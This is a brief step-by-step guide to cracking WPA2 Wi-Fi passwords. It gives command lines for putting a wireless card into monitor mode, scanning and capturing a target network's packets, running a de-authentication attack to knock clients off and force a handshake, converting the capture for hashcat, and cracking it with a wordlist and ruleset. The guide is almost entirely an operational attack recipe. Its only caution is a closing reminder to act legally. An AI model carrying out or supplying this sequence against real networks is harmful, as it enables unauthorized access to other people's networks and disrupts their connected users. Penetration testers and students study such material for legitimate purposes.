
Basic guide outlining the process to capture a handshake, convert it to a Hashcat compatible hash, and obtain the WPA2 password by cracking the hash with Hashcat

🕵️‍♂️ How to Crack WiFi: The Handshake Method 📡

🛠 Tools Required

🔧 Setup and Monitoring

📶 Identify Wireless Adapter

  • Command: iwconfig or ifconfig

🚫 Kill Competing Processes

  • Command: sudo airmon-ng check kill

📡 Enable Monitor Mode

  • Command: airmon-ng start <network interface>
  • Note: The card name often changes after being switched to monitor mode, confirm the name of your card with iwconfig or ifconfig.

🔍 Network Scanning

🐜 Scan for Networks

  • Command: sudo airodump-ng <network interface>

🎯 Focus Scan on Target Network

  • Command: sudo airodump-ng <network interface> --bssid <AP>

📦 Capture Packets

💾 Capture and Save Packets

  • Command: sudo airodump-ng -c <channel number> --bssid <AP BSSID> <network interface> -w <path for saved packets file>

🛑 De-authentication Attack

  • Command: sudo aireplay-ng -a <BSSID of the AP> --deauth <time> <network interface>
  • Tip: Targeting a client may be more effective than targeting the access point directly: sudo aireplay-ng -a <BSSID of the AP> -c <BSSID of the Client> --deauth <time> <network interface>

✅ Handshake Capture

  • Watch for: WPA handshake: <mac address>
  • Tip: If WPA handshake: <mac address> isn't displayed, you haven't captured the handshake. Try targeting the AP itself and each client individually.

🔄 Post-Capture Processing

🔄 Return Wireless Adapter to Managed Mode

  • Command: sudo service NetworkManager restart

🔑 Convert Handshake to Hashcat Format

  • Tool: Hashcat cap2hashcat
  • Tip: Upload the saved packets file. If the file is to big (>20MB), optimize the file using the command below.

🗑 Optimize Capture File Size

  • Command: tshark -r dumpfile.cap/pcap -R "(wlan.fc.type_subtype == 0x00 || wlan.fc.type_subtype == 0x02 || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x05 || wlan.fc.type_subtype == 0x08 || eapol)" -2 -F pcapng -w stripped.pcapng

🔓 Cracking the Handshake

🚀 Crack with Hashcat

  • Command: hashcat -m 22000 -o /path/to/output/file /path/to/converted/handshake/hash /path/to/wordlist -r /path/to/ruleset
  • Recommended Wordlist and Ruleset: Rockyou.txt and OneRuleToRuleThemStill

📌 Remember to operate ethically and within the bounds of the law when using these tools.